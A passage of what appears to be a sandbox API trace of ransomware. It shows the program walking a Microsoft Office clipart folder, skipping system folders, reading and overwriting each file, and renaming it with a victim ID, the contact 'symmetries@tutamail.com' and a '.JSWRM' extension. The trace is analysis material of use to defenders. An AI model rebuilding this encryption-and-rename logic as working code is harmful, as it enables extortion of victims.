MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0095.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0095.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0095.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0095.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0095.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.817] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00223_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00223_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00223_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0095.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0095.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0095.818] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x476e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00257_.WMF", cAlternateFileName="")) returned 1 [0095.818] lstrcmpiW (lpString1="SO00257_.WMF", lpString2=".") returned 1 [0095.818] lstrcmpiW (lpString1="SO00257_.WMF", lpString2="..") returned 1 [0095.818] lstrcmpiW (lpString1="SO00257_.WMF", lpString2="...") returned 1 [0095.818] lstrcmpiW (lpString1="SO00257_.WMF", lpString2="windows") returned -1 [0095.818] lstrcmpiW (lpString1="SO00257_.WMF", lpString2="recovery") returned 1 [0095.818] lstrcmpiW (lpString1="SO00257_.WMF", lpString2="perflogs") returned 1 [0095.818] lstrcmpiW (lpString1="SO00257_.WMF", lpString2="documents and settings") returned 1 [0095.818] lstrcmpiW (lpString1="SO00257_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.818] lstrcmpiW (lpString1="SO00257_.WMF", lpString2="system volume information") returned -1 [0095.818] lstrcmpiW (lpString1="SO00257_.WMF", lpString2="msocache") returned 1 [0095.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00257_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00257_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00257_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00257_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00257_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00257_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0095.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00257_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.819] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18286) returned 1 [0095.819] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4760) returned 0x24d210 [0095.819] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4760, lpOverlapped=0x0) returned 1 [0095.822] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.822] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4760, lpOverlapped=0x0) returned 1 [0095.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.822] CloseHandle (hObject=0x314) returned 1 [0095.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0095.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0095.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0095.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0095.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0095.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.823] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00257_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00257_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0095.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0095.823] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd8e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00289_.WMF", cAlternateFileName="")) returned 1 [0095.823] lstrcmpiW (lpString1="SO00289_.WMF", lpString2=".") returned 1 [0095.824] lstrcmpiW (lpString1="SO00289_.WMF", lpString2="..") returned 1 [0095.824] lstrcmpiW (lpString1="SO00289_.WMF", lpString2="...") returned 1 [0095.824] lstrcmpiW (lpString1="SO00289_.WMF", lpString2="windows") returned -1 [0095.824] lstrcmpiW (lpString1="SO00289_.WMF", lpString2="recovery") returned 1 [0095.824] lstrcmpiW (lpString1="SO00289_.WMF", lpString2="perflogs") returned 1 [0095.824] lstrcmpiW (lpString1="SO00289_.WMF", lpString2="documents and settings") returned 1 [0095.824] lstrcmpiW (lpString1="SO00289_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.824] lstrcmpiW (lpString1="SO00289_.WMF", lpString2="system volume information") returned -1 [0095.824] lstrcmpiW (lpString1="SO00289_.WMF", lpString2="msocache") returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00289_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00289_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00289_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0095.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00289_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00289_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00289_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0095.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00289_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.825] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=55520) returned 1 [0095.825] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd8e0) returned 0x24d210 [0095.825] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xd8e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xd8e0, lpOverlapped=0x0) returned 1 [0095.838] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.838] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xd8e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xd8e0, lpOverlapped=0x0) returned 1 [0095.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.839] CloseHandle (hObject=0x314) returned 1 [0095.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0095.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0095.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0095.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0095.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0095.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0095.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.839] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00289_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00289_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0095.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0095.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.840] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10cb8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00299_.WMF", cAlternateFileName="")) returned 1 [0095.840] lstrcmpiW (lpString1="SO00299_.WMF", lpString2=".") returned 1 [0095.840] lstrcmpiW (lpString1="SO00299_.WMF", lpString2="..") returned 1 [0095.841] lstrcmpiW (lpString1="SO00299_.WMF", lpString2="...") returned 1 [0095.841] lstrcmpiW (lpString1="SO00299_.WMF", lpString2="windows") returned -1 [0095.841] lstrcmpiW (lpString1="SO00299_.WMF", lpString2="recovery") returned 1 [0095.841] lstrcmpiW (lpString1="SO00299_.WMF", lpString2="perflogs") returned 1 [0095.841] lstrcmpiW (lpString1="SO00299_.WMF", lpString2="documents and settings") returned 1 [0095.841] lstrcmpiW (lpString1="SO00299_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.841] lstrcmpiW (lpString1="SO00299_.WMF", lpString2="system volume information") returned -1 [0095.841] lstrcmpiW (lpString1="SO00299_.WMF", lpString2="msocache") returned 1 [0095.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0095.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00299_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00299_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00299_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0095.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0095.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00299_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00299_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00299_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0095.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0095.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00299_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.842] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=68792) returned 1 [0095.842] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10cb0) returned 0x24d210 [0095.842] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x10cb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x10cb0, lpOverlapped=0x0) returned 1 [0095.849] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.849] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x10cb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x10cb0, lpOverlapped=0x0) returned 1 [0095.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.850] CloseHandle (hObject=0x314) returned 1 [0095.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0095.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0095.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0095.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0095.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0095.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0095.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.851] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00299_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00299_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0095.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0095.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.852] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, 